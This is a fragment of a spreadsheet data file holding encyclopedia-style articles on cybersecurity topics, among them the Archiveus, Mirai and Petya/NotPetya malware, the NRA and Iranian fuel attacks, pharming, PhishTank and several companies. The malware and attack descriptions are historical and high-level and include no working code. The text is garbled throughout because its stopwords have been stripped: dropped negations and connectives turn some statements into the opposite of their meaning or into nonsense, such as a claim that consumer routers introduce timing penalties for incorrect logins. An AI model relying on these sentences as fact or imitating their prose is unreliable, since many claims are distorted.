2012) (released: february 2012) (released: october 2011) (released: july 2011) (released: 2011) references</t>
  </si>
  <si>
    <t>Archiveus</t>
  </si>
  <si>
    <t>archiveus computer virus microsoft windows operating systems used method extortion. trojan horse-type ransomware virus encrypts user's files. user must purchase something specific sites obtain password decrypt files. 2006, password protection cracked. password restoring affected files found "mf2lro8sw03ufvnsq034jfowr18f3cszc20vmw". references external links virus information symantec</t>
  </si>
  <si>
    <t>2021 National Rifle Association ransomware attack</t>
  </si>
  <si>
    <t>october 2021, russian hacker group known grief published documents attributed national rifle association (nra) ransomware scam, claimed hacked organization, threatened release documents undisclosed ransom paid. background october 2021, federal bureau investigation hacked shut revil, major hacking organization involved ransomware scams. response, ransomware groups shared anti-united states messages dark web.prior ransomware attack, national rifle association involved multiple legal disputes, recorded future analyst allan liska argued made easier target cyberattacks attention within organization pulled away security. ransomware attack initial release documents october 2021, grief published documents website part ransomware scam, attributing internal documents belonging claiming hacked organization. reported wired, hack likely took place within week prior release documents. group threatened release files ransom undisclosed amount money) paid.an anonymous person direct knowledge events told associated press group issues email system week prior publication files grief, potential indicator ransomware attack. october register reported unknown whether hack targeted headquarters local branches.the leaked files included minutes board meeting occurred shortly release documents well multiple files related grants. trace reported document appeared late 2019 grant application made david kopel behalf independence institute $267,000, $248,500 earmarked kopel's salary. kopel repeatedly filed amicus briefs supporting court, disclosed financial connection organization. related twitter activity after ransomware attack announced grief, hundreds twitter accounts created august september 2021 shared tweets attack. most accounts feminine names, majority used default twitter profile photo others used pictures appeared taken online dating services shuri-muri tralolo. some accounts previously posted earlier ransomware attack grief nra, violence, nazis. november 2021, unclear whether connection grief network twitter accounts. temporary removal released documents october grief removed documents attributed dark website published. brett callow, threat analyst employed emsisoft, noted delisting website could mean organization paid ransom, additional possibilities; could also indicate entered negotiations grief ransomware group chosen remove documents drawn much enforcement attention. however, november washington times reported callow published screenshot showing documents attributed visible grief website. release additional documents november reload reported grief published internal documents previous day, stating documents included bank account information organization well information specific employees including social security numbers home addresses. outlet additionally reported authenticity leaked documents confirmed "six current former officials" including individual whose personal information exposed leak, aware existence prior contacted reload.also november grief moved nra-related documents website section indicating hacks progress different indicating completed. explanation provided. perpetrators russian hacker group known grief responsible ransomware scam. group first became active 2021. news reported computer security experts believe grief rebrand russian group evil corp. evil corp linked ransomware attacks sinclair broadcast group well hundreds financial entities across countries. 2019, action group including sanctions taken multiple united states federal agencies; subject sanctions united states department treasury. experts additionally theorized grief rebrand doppelpaymer, another ransomware group associated evil corp. response response october 2021, tweeted statement managing director public affairs andrew arulanandam. statement said discuss security, group "takes extraordinary measures protect information regarding members, donors, operations". declined requests comment hill requests comment nbc. daily beast reported email spokesperson returned error message, potentially indicating organization's email server offline, spokesperson hunter declined comment reached phone.as october 2021, unclear whether plans ransom. because link grief evilcorp, sanctioned united states treasury, would need permission treasury transfer ransom money grief; without permission could lead imposition penalties.as october 2021, confirmed hacked targeted ransomware scam, confirmed validity documents released grief. they respond request comment wired asking whether negotiating grief paid ransom.as november 2021, made official comment ransomware attack. organization's response attack remained unclear. reload reported multiple current former officials confirmed authenticity leaked documents, board member phillip journey told outlet lack information staff "disconcerting" asked "who knows went, have, could still sell?" public response october register reported hack generated amused reaction internet, suggesting targeting popular public hacking government, school, healthcare facilities grief historically done. references</t>
  </si>
  <si>
    <t>Mirai (malware)</t>
  </si>
  <si>
    <t>mirai (from japanese word "future", malware turns networked devices running linux remotely controlled bots used part botnet large-scale network attacks. primarily targets online consumer devices cameras home routers. mirai botnet first found august 2016 malwaremustdie, white malware research group, used largest disruptive distributed denial service (ddos) attacks, including attack september 2016 computer security journalist brian krebs' site, attack french host ovh, october 2016 cyberattack. according chat anna-senpai robert coelho, mirai named 2011 anime series mirai nikki.the software initially used creators ddos minecraft servers companies offering ddos protection minecraft servers, authors using mirai operate protection racket. source code mirai subsequently published hack forums open-source. since source code published, techniques adapted malware projects. malware devices infected mirai continuously scan internet address internet things (iot) devices. mirai includes table address ranges infect, including private networks addresses allocated united states postal service department defense.mirai identifies vulnerable devices using table common factory default usernames passwords, logs infect mirai malware. infected devices continue function normally, except occasional sluggishness, increased bandwidth. device remains infected rebooted, involve simply turning device short wait turning back after reboot, unless login password changed immediately, device reinfected within minutes. upon infection mirai identify "competing" malware, remove memory, block remote administration ports.victim devices identified “first entering rapid scanning phase asynchronously “statelessly” sent probes pseudo-random ipv4 addresses, excluding hard-coded blacklist, telnet ports 2323”. device responds probe, attack enters brute-force login phase. during phase, attacker tries establish telnet connection using predetermined username password pairs list credentials. most logins default usernames passwords vendor. device allows telnet access, victim's along successfully used credential sent collection server. there hundreds thousands devices default settings, making vulnerable infection. once infected, device monitor command control server indicates target attack. reason large number devices bypass anti-dos software monitors address incoming requests filters sets block identifies abnormal traffic pattern, example, many requests come particular address. other reasons include able marshall bandwidth perpetrator assemble alone, avoid traced. mirai internet things (iot) devices threat stopped arrest actors. some believe actors utilizing mirai malware source code github evolve mirai variants. they speculate goal expand botnet node many devices. detail recent progress variants listed following paragraphs. december 2017, researchers identified variant mirai exploiting zero-day flaw huawei hg532 routers accelerate mirai botnets infection, implementing known soap related exploits routers interface, cve-2014–8361 cve-2017–17215. this mirai version called "satori". january 2018, variant mirai dubbed “okiru” already targeting popular embedded processor like arm, mips, x86, powerpc others found targeting processors based linux devices first time. argonaut risc core processor (shorted: processors) second-most-popular embedded processor, shipped billion products year, including desktop computers, servers, radio, cameras, mobile, utility meters, televisions, flash drives, automotive, networking devices (smart hubs, modems, routers, wifi) internet things. only relatively small number arc-based devices linux therefore exposed mirai. january 2018, successor mirai reported designed hijack cryptocurrency mining operations.on january 2018, similar mirai variant botnets reported, modified version weaponizes 38722 d-link router's exploit enlist vulnerable devices. vulnerability router's home network administration protocol (hnap) utilized craft malicious query exploited routers bypass authentication, cause arbitrary remote code execution. less modified version mirai called "masuta" (after japanese transliteration "master"), modified version called "puremasuta".in march 2018, variant mirai, dubbed "omg", emerged surface added configurations target vulnerable devices turning proxy servers. firewall rules allow traffic travel generated http socks ports added configurations mirai code. once ports open traffic, sets 3proxy open-source software available russian website.between june 2018, another variant mirai, dubbed "wicked", emerged added configurations target least three additional exploits including affecting netgear routers cctv-dvrs. wicked scans ports 8080, 8443, attempts locate vulnerable, unpatched devices running ports. researchers suspect author created wicked, sora, owari, omni botnets.in early july 2018 reported least thirteen versions mirai malware detected actively infecting linux internet things (iot) internet, three designed target specific vulnerabilities using exploit proof concept, without launching brute-forcing attack default credential authentication. month published report infection campaign mirai malware android devices android debug bridge tcp/5555 actually optional feature android operating system, discovered feature appears enabled android phones.at 2018, mirai variant dubbed "miori" started spread remote code execution vulnerability thinkphp framework, affecting versions 5.0.23 5.1.31. this vulnerability continuously abused evolved mirai variants dubbed "hakai" "yowai" january 2019, variant "speakup" february, 2019. ddos attacks mirai used, alongside bashlite, ddos attack september 2016 krebs security site reached gbit/s. technica also reported tbit/s attack french host ovh.on october 2016, multiple major ddos attacks services service provider occurred using mirai malware installed large number devices, many still using default usernames passwords. these attacks resulted inaccessibility several high-profile websites, including github, twitter, reddit, netflix, airbnb many others. attribution attack mirai botnet originally reported level communications.mirai later revealed used ddos attacks rutgers university 2014 2016, left faculty students campus unable access outside internet several days time. additionally, failure university's central authentication service caused course registration services unavailable critical times academic semester. university reportedly spent $300,000 consultation increased cyber-security budget university million response attacks. university cited attacks among reasons increase tuition fees 2015–2016 school year. person alias "exfocus" claimed responsibility attacks, stating reddit /r/rutgers subreddit user student school ddos attacks motivated frustrations university's system. user later claimed interview jersey-based blogger lied affiliated university attacks funded anonymous client. security researcher brian krebs later alleged user indeed student rutgers university latter interview given attempt distract investigators.staff deep learning security observed steady growth mirai botnets october attack.mirai also used attack liberia's internet infrastructure november 2016. according computer security expert kevin beaumont, attack appears originated actor also attacked dyn. other notable incidents november 2016, approximately 900,000 routers, deutsche telekom produced arcadyan, crashed failed tr-064 exploitation attempts variant mirai, resulted internet connectivity problems users devices. while talktalk later patched routers, variant mirai discovered talktalk routers.a british suspected behind attack arrested luton airport, according bbc. identity author january 2017, computer security journalist brian krebs lto3 posted article blog, krebs security, disclosed name person believed written malware. krebs stated likely real-life identity anna-senpai (named anna nishikinomiya, character shimoneta), author mirai, actually paras jha, owner ddos mitigation service company protraf solutions student rutgers university. update original article, paras responded krebs denied written mirai. reported questioned involvement october 2016 cyberattack. december 2017, paras jha, josiah white, dalton norman entered guilty plea crimes related mirai botnet.daniel kaye, also known alias "bestbuy", "popopret" "spiderman", accused "using infected network computers known mirai botnet attack blackmail lloyds banking group barclays banks," according nca. extradited germany according report. kaye also pleaded guilty court hijacking 900,000 routers network deutsche telekom.researchers later pointed handle name "nexus zeta" responsible author variants mirai (dubbed okiru, satori, masuta puremasuta), august 2018 american grand jury indicted kenneth currin schuchman, nexus zeta, knowingly causing transmission program, information, code, commands, result conduct intentionally causing damage without authorization protected computers, according indictment filed u.s. district court anchorage, followed arrest trial suspect. popular culture american electronic musician composer james ferraro's 2018 album four pieces mirai references mirai ongoing narrative. also linux malware denial-of-service attack bashlite another notable malware linux.darlloz another notable malware remaiten another ddos linux.wifatch hajime brickerbot references</t>
  </si>
  <si>
    <t>2021 Iranian fuel cyberattack</t>
  </si>
  <si>
    <t>iranian fuel 2021 cyberstrike attack iranian fuel system, government-issued cards used buying subsidized fuel, digital road billboards. attack took place october 2021. government announced people without ration card. according supreme council cyberspace, attacks similar attack iranian rail road transit system july. iranian president ebrahim raisi stated, "this cyberattack neither first time last."network infrastructure semi-isolated system connected internet instead uses national internet (national information network).gholamreza jalali, head iranian civil defense, accused united states israel behind attack interview state scale details iran's 4300 stations unable process payments. initially, ministry petroleum blamed technical error, though later revealed cyberattack. users trying purchase fuel affected stations received display reading "cyberattack 64411" associated hotline ayatollah's office responds questions islamic law, though possible connection commented official iranian agencies. cybersecurity industry firms noted similarity 2020 rail attack similar message displayed, prompting speculation possible connection attacks. previous attack attributed security researchers check point hacking group indra, claims anti-government partisan resistance group.digital billboards iranian cities seen displaying messages "khameini! where fuel?" news attack spread. group called predatory sparrow claimed credit attack along previous cyberattacks iranian rail assets earlier 2021, although iranian officials simply attributed unnamed state actor. also cyberwarfare cyberweapon cyberwarfare iran iranian cyber police sources</t>
  </si>
  <si>
    <t>Petya and NotPetya</t>
  </si>
  <si>
    <t>petya family encrypting malware first discovered 2016. malware targets microsoft windows–based systems, infecting master boot record execute payload encrypts hard drive's file system table prevents windows booting. subsequently demands user make payment bitcoin order regain access system. variants petya first seen march 2016, propagated infected e-mail attachments. june 2017, variant petya used global cyberattack, primarily targeting ukraine. variant propagates eternalblue exploit, generally believed developed u.s. national security agency (nsa), used earlier year wannacry ransomware. kaspersky referred version notpetya distinguish 2016 variants, differences operation. addition, although purports ransomware, variant modified unable actually revert changes. notpetya attacks blamed russian government, specifically sandworm hacking group within russian military intelligence organization, security researchers, google, several governments. history petya discovered march 2016; check point noted achieved fewer infections ransomware active early 2016, cryptowall, contained notable differences operation caused "immediately flagged next step ransomware evolution". another variant petya discovered 2016 contained secondary payload used malware cannot achieve administrator-level access.the name "petya" reference 1995 james bond film goldeneye, wherein petya soviet weapon satellites carry "goldeneye"—an atomic bomb detonated earth orbit produce electromagnetic pulse. twitter account heise suggested belonged author malware, named "janus cybercrime solutions" alec trevelyan's crime group goldeneye, avatar image goldeneye character boris grishenko, russian hacker antagonist film played scottish actor alan cumming.on august 2018, regional court nikopol dnipropetrovsk oblast ukraine convicted unnamed ukrainian citizen year prison pleading guilty spread version petya online. 2017 cyberattack june 2017, major global cyberattack began (ukrainian companies among first state attacked), utilizing variant petya. day, kaspersky reported infections france, germany, italy, poland, united kingdom, united states, majority infections targeted russia ukraine, companies initially attacked, including national bank ukraine. eset estimated june 2017 infections ukraine, germany second hardest russian president vladimir putin's press secretary, dmitry peskov, stated attack caused serious damage russia. experts believed politically-motivated attack ukraine, since occurred ukrainian holiday constitution day.kaspersky dubbed variant "notpetya", major differences operations comparison earlier variants. mcafee engineer christiaan beek stated variant designed spread quickly, targeting "complete energy companies, power grid, stations, stations, airport, banks".it believed software update mechanism m.e.doc—a ukrainian preparation program that, according f-secure analyst mikko hyppönen, "appears facto" among companies business country—had compromised spread malware. analysis eset found backdoor present update system least weeks prior attack, describing "thoroughly well-planned well-executed operation". developers m.e.doc denied entirely responsible cyberattack, stating victims.on july 2017, ukraine's cybercrime unit seized company's servers detecting "new activity" believed would result "uncontrolled proliferation" malware. ukraine police advised m.e.doc users stop using software, presumed backdoor still present. analysis seized servers showed software updates applied since 2013, evidence russian presence, employee's account servers compromised; head units warned m.e.doc could found criminally responsible enabling attack negligence maintaining security servers. operation petya's payload infects computer's master boot record (mbr), overwrites windows bootloader, triggers restart. upon startup, payload encrypts master file table ntfs file system, displays ransom message demanding payment made bitcoin. meanwhile, computer's screen displays purportedly output chkdsk, windows' file system scanner, suggesting hard drive's sectors repaired.the original payload required user grant administrative privileges; variant petya bundled second payload, mischa, activated petya failed install. mischa conventional ransomware payload encrypts user documents, well executable files, require administrative privileges execute. earlier versions petya disguised payload file, attached e-mail. united states computer emergency response team (us-cert) national cybersecurity communications integration center (nccic) released malware initial findings report (mifr) petya june 2017.the "notpetya" variant used 2017 attack uses eternalblue, exploit takes advantage vulnerability windows' server message block (smb) protocol. eternalblue generally believed developed u.s. national security agency (nsa); leaked april 2017 also used wannacry. malware harvests passwords (using tweaked build open-source mimikatz) uses techniques spread computers network, uses passwords conjunction psexec code local computers. additionally, although still purports ransomware, encryption routine modified malware could technically revert changes. this characteristic, along unusual signs comparison wannacry (including relatively unlock us$300, using single, fixed bitcoin wallet collect ransom payments rather generating unique specific infection tracking purposes), prompted researchers speculate attack intended profit-generating venture, damage devices quickly, ride media attention wannacry received claiming ransomware. mitigation found possible stop encryption process infected computer immediately shut fictitious chkdsk screen appears, security analyst proposed creating read-only files named perfc and/or perfc.dat windows installation directory could prevent payload current strain executing. email address listed ransom screen suspended provider, posteo, violation terms use. result, infected users could actually send required payment confirmation perpetrator. additionally, computer's filesystem based, encryption sequence skipped, ransomware's message displayed, allowing data recovered trivially.microsoft already released patches supported versions windows march 2017 address eternalblue vulnerability. this followed patches unsupported versions windows (such windows 2017, direct wake wannacry. wired believed "based extent damage petya caused far, though, appears many companies patching, despite clear potentially devastating threat similar ransomware spread." some enterprises consider disruptive install updates certain systems, either possible downtime compatibility concerns, problematic environments. impact report published wired, white house assessment pegged total damages brought notpetya billion. this confirmed former homeland security advisor bossert, time attack senior cybersecurity focused official government.during attack initiated june 2017, radiation monitoring system ukraine's chernobyl nuclear power plant went offline. several ukrainian ministries, banks metro systems also affected. said destructive cyberattack ever.among affected elsewhere included british advertising company wpp, maersk line, american pharmaceutical company merck co., russian company rosneft (its production unaffected), multinational firm piper, french construction company saint-gobain retail subsidiary outlets estonia, british consumer goods company reckitt benckiser, german personal care company beiersdorf, german logistics company dhl, united states food company mondelez international, american hospital operator heritage valley health system. cadbury's chocolate factory hobart, tasmania, first company australia affected petya. june 2017, jnpt, india's largest container port, reportedly affected, operations coming standstill. princeton community hospital rural west virginia scrap replace entire computer network path recovery.the business interruption maersk, world's largest container ship supply vessel operator, estimated $200m $300m lost revenues.the business impact fedex estimated $400m 2018, according company's 2019 annual report.jens stoltenberg, nato secretary-general, pressed alliance strengthen cyber defenses, saying cyberattack could trigger article principle collective defense.mondelez international's insurance carrier, zurich american insurance company, refused claim cleaning damage notpetya infection, grounds notpetya "act war" covered policy. mondelez suing zurich american $100 million. reaction europol said aware urgently responding reports cyber attack member states european union. united states department homeland security involved coordinating international local partners. letter nsa, democratic congressman lieu asked agency collaborate actively technology companies notify software vulnerabilities help prevent future attacks based malware created nsa. february 2018, trump administration blamed russia attack warned would "international consequences". united kingdom australian government also issued similar statements.in october 2020 named officers indictment. time, government blamed gru's sandworm also attacks 2020 summer games. other notable low-level malware (1998) stuxnet (2010) wannacry (2017) also portal internet portal references further reading</t>
  </si>
  <si>
    <t>PhishTank</t>
  </si>
  <si>
    <t>phishtank anti-phishing site. phishtank launched october 2006 entrepreneur david ulevitch offshoot opendns. company offers community-based phish verification system users submit suspected phishes users "vote" phish not. opendns acquired cisco turn phishtank system turned cisco talos.phishtank used opera, wot, yahoo! mail, mcafee, apwg, cmu, benard, mozilla, kaspersky, firetrust, officer blue, finra, message level, surbl, sanesecurity clamav, career builder, site truth, avira, c-sirt, phishtank sitechecker.phishtank data provided free download access call, including commercial use, restrictive license. 2018, announced phishtank rebuilding website, features functionality. 2020, flagrant abuse phishtank system, "new user" registration removed, remain foreseeable future. phishtank currently rethought ground provide better support, remove abuse, operate faster machine learning backend phish identification system. this redesign cisco talos communities team joel esler. there currently completion date project. also anti-phishing working group references</t>
  </si>
  <si>
    <t>Mimecast</t>
  </si>
  <si>
    <t>mimecast limited jersey-domiciled, uk-headquartered company specializing cloud-based email management microsoft exchange microsoft office 365, including security, archiving, continuity services protect business mail. history mimecast founded 2003 peter bauer neil murray. offices london, boston, chicago, francisco, dallas, cape town, johannesburg, melbourne, amsterdam, munich israel. october 2015, mimecast announced filed registration statement proposed initial public offering (ipo). mimecast began trading nasdaq global select market ticker symbol "mime" november 2015. offering closed november 2015. july 2018, mimecast acquired cybersecurity training start ataata.on july 2018, mimecast acquired solebit.on november 2019, mimecast acquired dmarc analyzer.on january 2020, mimecast acquired segasec.on 2022, mimecast acquired become wholly-owned subsidiary magnesium bidco limited, affiliate permira holdings ltd. founding mimecast co-founder ceo, peter bauer, previously founded technology mid-nineties sold idion. earlier, peter trained microsoft systems engineer worked corporate messaging systems. mimecast co-founder neil murray, previously global technology services founder pro-solutions.other executives include mimecast chief scientist nathaniel borenstein, amongst original designers mime protocol formatting multimedia internet electronic mail sent world's first e-mail attachment march 1992. technology service uses massively-parallel grid infrastructure email storage processing geographically dispersed data centers. mail transfer agent provides intelligent email routing based server user mailbox location.email security secure email gateway: user optimized spam protection, malware, protection. real-time diagnostic reporting; data loss prevention, secure message delivery, email branding disclaimer management, document conversion metadata management, real-time online queue management, large attachment management, advanced routing spooling. targeted threat protection: rewriting gateway time-of-click scanning malicious content opened. large file send: send receive large files outlook, encryption, optional access custom expiration dates. secure messaging: secure email channel sensitive information either user-initiated policy-driven.enterprise information archiving cloud archive email: encrypted cloud storage saves emails triplicate immutable storage system. users access search emails outlook desktop client. archive access available desktop apps android, blackberry, windows mobile devices.mailbox continuity continuity: during primary mail system outages, email accessed microsoft outlook, browser mobile devices. security privacy breaches january 2021, mimecast security certificate revealed compromised, potentially allowing attackers intercept communications microsoft-based email servers. references external links official website</t>
  </si>
  <si>
    <t>Minds</t>
  </si>
  <si>
    <t>minds open source, distributed social network. users earn money cryptocurrency using minds, tokens used boost posts crowdfund users. minds described privacy-focused mainstream social media networks. minds describes focused free speech, minimally moderates content platform. founders said remove controversial content site desire deradicalize post civil discourse. history minds founded 2011 bill ottman alternative social networks facebook, founders believed abused users "spying, data mining, algorithm manipulation, revenue sharing". other cofounders mark harding, crossland, john ottman, jack ottman. minds launched public june 2015.a facebook page affiliated hacktivist group anonymous encouraged followers support minds 2015, called developers contribute service's open source codebase.in 2018, 150,000 vietnamese users joined minds fearing facebook would comply requiring remove political dissent release user data vietnamese government. beginning 2020, 250,000 thai users joined minds growing concerns privacy twitter, widely used political activism. this minds thai language support mobile apps, upgrade servers handle influx traffic.in october 2019, united states president donald trump invited minds social media summit hosted white house. january 2021, youtube facebook removed tens thousands trump supporters alleged white supremacists platforms wake 2021 united states capitol attack earlier month, minds among alternative apps users adopted. service minds website well desktop mobile app. platform awards ethereum erc20 cryptocurrency tokens users based engagement site, users spend tokens promote content crowdfund users monthly subscriptions. tokens also bought redeemed standard currency. minds offers monthly premium subscription gives users access exclusive content, ability become verified, ability remove boosted posts feed.posts minds appear reverse chronological order, unlike many mainstream platforms complex often secret ranking algorithms determine posts appear.minds described alt-tech platform, alongside services including parler, gab, mastodon, bitchute, mewe. privacy security minds described privacy-focused competitors. messages sent users end-to-end encrypted, meaning even work company can't read contents. minds also open source, codebase freely audited vulnerabilities privacy concerns. users optionally register anonymously.in 2015 application security consultant posted full disclosure mailing list minds client accepting encryption keys without identity verification, minds using weak cryptography protocol. earlier week, security company released full disclosure report claiming found possible delete message, edit user's profile, upload arbitrary files minds. mark harding, minds' cto, denied claims made mailing list. security researcher johns hopkins information security institute agreed encryption used minds weak, saying although necessarily exploitable, optimistic right". bill ottman, minds' ceo, acknowledged issues reported security company's full disclosure said company addressed them. content 2018 interview techcrunch, founder bill ottman said mind's mission "internet freedom privacy, transparency, free speech within user control". minds' terms service disallows doxing, inciting violence, posting terroristic content, harassing users directly. minds described less rigorous removing objectionable content mainstream social networks. 2018 wired article noted hate speech disallowed, reported "the vast majority content minds innocuous, posts appear would constitute hate speech platforms".following february 2018 appearance ottman news show tucker carlson tonight, media matters america described minds "full bigotry" described site's content racist, antisemitic, misogynist. also 2018, writer engadget wrote concerns site's commitment protecting free speech: "it's survey popular channels platform start wondering sort free speech debate minds interested protecting. site's stars largely intellectual bantamweights far-right movement, debate seems one-sided. wondering people pepe frog avatars migrated here. fact, general tenor minds combination race hate, porn, 'pro-white erotica' lots lots weed". vice criticized minds 2019 "haven" neo-nazis far-right groups individuals. response 2019 allegations, site banned several neo-nazis people belonging hate groups. nathaniel popper wrote york times 2021 minds "became online home right-wing personalities neo-nazis booted mainstream social networks, along fringe groups, countries, targeted governments". moderation 2018, minds small team responsible policing content site, using artificial intelligence detect content violated site's terms service. 2019, wired wrote minds' moderation team "about five" people, company process forming "jury system" would remove content based votes users. august 2019, ottman said recently rolled jury system, allows users feel moderation content unfair appeal randomly-selected twelve-person jury made users. deradicalization ottman said opposes removing hate speech objectionable content minds believes draw attention opposes deplatforming extremists believes serves push people towards "other darker corners internet". 2019 statement vice, minds executives expressed belief "free expression transparency antidote radicalization, violence, extremism".minds partnered daryl davis deradicalization project called "change minds". davis black musician also engages members klux klan convince leave disavow group. davis said hopes minds teach people engage civilly another even hold opposing views. users minds told business insider experienced million visits 2015. 2018, wired said minds million users total, 110,000 active given month. 2020, minds reported million registered users 300,000 monthly active users.according guardian, minds group alt-tech websites "whose light touch content moderation presented commitment free speech", conservatives create accounts platform event bans restrictive sites. january 2021, york times reported youtube facebook removed tens thousands trump supporters white supremacists platforms minds among alternative apps users adopted. funding minds funded venture capital equity crowdfunding. company raised $350,000 2013. service later raised million regulation equity crowdfunding campaign wefunder platform. october 2018, minds raised million series funding medici ventures, overstock.com subsidiary managed pelion venture partners. 2021, minds raised million series futo, organization founded develop technology share knowledge gives control computers back people. also references external links official website</t>
  </si>
  <si>
    <t>Associated Signature Containers</t>
  </si>
  <si>
    <t>associated signature containers (asic) specifies container structures bind together signed objects either advanced electronic signatures timestamp tokens single digital container. regulatory context under eidas-regulation, associated signature container (asic) eidas data container used hold group file objects digital signatures and/or time assertions associated objects. this data stored asic format. european commission implementing decision 2015/1506 september 2015 laid specifications relating formats advanced electronic signatures advanced seals recognised public sector bodies pursuant articles eidas-regulation. member states requiring advanced electronic signature advanced electronic signature based qualified certificate, shall recognise xml, advanced electronic signature conformance level level using associated signature container, signatures comply following technical specifications: xades baseline profile etsi 103171 v.2.1.1. cades baseline profile etsi 103173 v.2.2.1. pades baseline profile etsi 103172 v.2.2.2. associated signature container baseline profile etsi 103174 v.2.2.1technical specification asics updated standardized since april 2016 european telecommunications standards institute standard associated signature containers (asic)(etsi 162-1 v1.1.1 (2016-04), updated standard required european commission implementing decision. structure internal structure asic includes folders: root folder stores container's content, might include folders reflect structure content. “meta-inf” folder resides root folder contains files hold metadata content, including associated signature and/or time assertion files.such electronic signature file would contain single cades object xades signatures. time assertion file would either contain timestamp token conform ietf 3161, whereas single evidence record would conform ietf 4998 ietf rfc6283. asic used purposes electronic signature secure data attached modified. this done creating dataset combines signature signed data store detached signature separate resource utilize external process re-associate signature data. advantageous detached signatures prevents unauthorized modifications original data objects. however, this, risk detached signature become separated associated data. happen, association would lost therefore, data would become inaccessible.one widespread deployments asic standard estonian digital signature system multiplatform (windows, linux, macos (osx)) software called digidoc. types asic containers using correct tool always important. using correct type asic container hand also important: asic simple (asic-s) with container, single file object associated signature time assertion file. “mimetype” file specifies media type might also included container. when mimetype file included, required first file asic container. this container type allow additional signatures added future used sign stored file objects. when long-term time-stamp tokens used, asic archive manifest files used protect long-term time-stamp tokens tampering. asic extended (asic-e) this type container hold signature time assertion files. asic-e xades deals signature files, asic-e cades deals time assertions. files within asic containers apply file object sets. each file object might additional metadata information associated also protected signature. asic-e container could designed prevent modification allow inclusion without causing damage previous signatures. both asic containers capable maintaining long-term availability integrity storing xades cades signatures time-stamp tokens evidence record manifest files contained within containers. asic containers must comply specification limitations applied zip. asic-s time assertion additional container this container operates baseline requirements asic simple (asic-s) container also provides additional time assertion requirements. additional elements within meta-inf folder requires “signeddata” variable include certificate revocation information. asic-e cades additional container this container baselines asic-e container, additional restrictions. asic-e time assertion additional container this container complies asic-e baseline requirements along additional requirements restrictions. reduced risk loss electronic signature asic reduces risk electronic signature becoming separated data combining signature signed data container. with elements secured within asic, easier distribute signature guarantee correct signature metadata used validation. this process also used associating time assertions, including evidence records time-stamp tokens associated data. references external links free open-source java library creating/manipulating pades/cades/xades/asic signatures github repository ades toolset</t>
  </si>
  <si>
    <t>Minecode</t>
  </si>
  <si>
    <t>minecode, privately held consulting company based bellevue, washington, united states. development centers india focus microsoft, java, technologies. history minecode established 2001 syntegral, llc. 2003, syntegral, changed name minecode. 2005, minecode established offshore subsidiary gurgaon, india. minecode currently minebrain, headquartered india. samal moved remaining assets offshore avoid attachment bankruptcy legal proceedings. 2007, minecode purchased seattle-based technologies, company specializing customized marketing technology solutions shortly thereafter, early 2008, purchased saltmine, interactive design firm offices seattle, washington portland, oregon.in february 2010, minecode saltmine filed bankruptcy leaving multiple employees unpaid salaries expenses. employees filed suit following backrupcy filing. scandals minecode employees, pradyumna samal samal) project manager sandeep verma, pleaded guilty several counts computer intrusion 2009. charges arose employees bellevue development shop intentionally disabled site vinado, online wine shop allegedly failed bills. verma ordered $2,500 fine sentenced year probation. minecode also sentenced years' probation, fine $144,000 restitution $120,000. samal sentenced days home confinement electronic monitoring years' probation. also instructed complete hours community service undergo moral reconation therapy. references</t>
  </si>
  <si>
    <t>Pharming</t>
  </si>
  <si>
    <t>pharming cyberattack intended redirect website's traffic another, fake site installing malicious program computer. pharming conducted either changing hosts file victim's computer exploitation vulnerability server software. servers computers responsible resolving internet names real addresses. compromised servers sometimes referred "poisoned". pharming requires unprotected access target computer, altering customer's home computer, rather corporate business server.the term "pharming" neologism based words "farming" "phishing". phishing type social-engineering attack obtain access credentials, user names passwords. recent years, pharming phishing used gain information online identity theft. pharming become major concern businesses hosting ecommerce online banking websites. sophisticated measures known anti-pharming required protect serious threat. antivirus software spyware removal software cannot protect pharming. pharming vulnerability home work while malicious domain-name resolution result compromises large numbers trusted nodes name lookup, vulnerable points compromise near leaves internet. instance, incorrect entries desktop computer's hosts file, circumvents name lookup local name address mapping, popular target malware. once rewritten, legitimate request sensitive website direct user fraudulent copy. personal computers desktops laptops often better targets pharming receive poorer administration internet servers. more worrisome host-file attacks compromise local network router. since routers specify trusted clients join network, misinformation spoil lookups entire lan. unlike host-file rewrites, local-router compromise difficult detect. routers pass information ways: misconfiguration existing settings wholesale rewrite embedded software (aka firmware). many routers allow administrator specify particular, trusted place suggested upstream node (e.g., isp). attacker could specify server control instead legitimate one. subsequent resolutions would server. alternatively, many routers ability replace firmware (i.e. internal software executes device's complex services). like malware desktop systems, firmware replacement difficult detect. stealthy implementation appear behave manufacturer's firmware; administration page look same, settings appear correct, etc. this approach, well executed, could make difficult network administrators discover reconfiguration, device appears configured administrators intend actually redirects traffic background. pharming many attacks malicious firmware mount; others include eavesdropping, active middle attacks, traffic logging. like misconfiguration, entire subject actions. themselves, pharming approaches academic interest. however, ubiquity consumer grade wireless routers presents massive vulnerability. administrative access available wirelessly devices. moreover, since routers often work default settings, administrative passwords commonly unchanged. even altered, many guessed quickly dictionary attacks, since consumer grade routers introduce timing penalties incorrect login attempts. once administrative access granted, router's settings including firmware altered. these attacks difficult trace occur outside home small office outside internet. instances pharming 15th january 2005, domain name large york isp, panix, hijacked point website australia. financial losses known. domain later restored 17th january, icann's review blames melbourne (now known "arq group") result failure melbourne obtain express authorization (sic) registrant accordance icann's inter-registrar transfer policy."in february 2007, pharming attack affected least financial companies u.s., europe, asia. attackers created similar page targeted financial company, requires effort time. victims clicked specific website malicious code. this website forced consumers' computers download trojan horse. subsequent login information targeted financial companies collected. amount individuals affected unknown incident continued three days.in january 2008, symantec reported drive-by pharming incident, directed mexican bank, settings customer's home router changed receipt e-mail appeared legitimate spanish-language greeting-card company. controversy term term "pharming" controversial within field. conference organized anti-phishing working group, phillip hallam-baker denounced term marketing neologism designed convince banks security services". also phishing spoofing risk mutual authentication trusteer notes references sources"security: phishing pharming". windows magazine. june 2005. archived original august 2005. "how stop phishing pharming scams?". magazine. july 2005. archived original november 2005. external links after phishing? pharming!</t>
  </si>
  <si>
    <t>MiniDiscs (Hacked)</t>
  </si>
  <si>
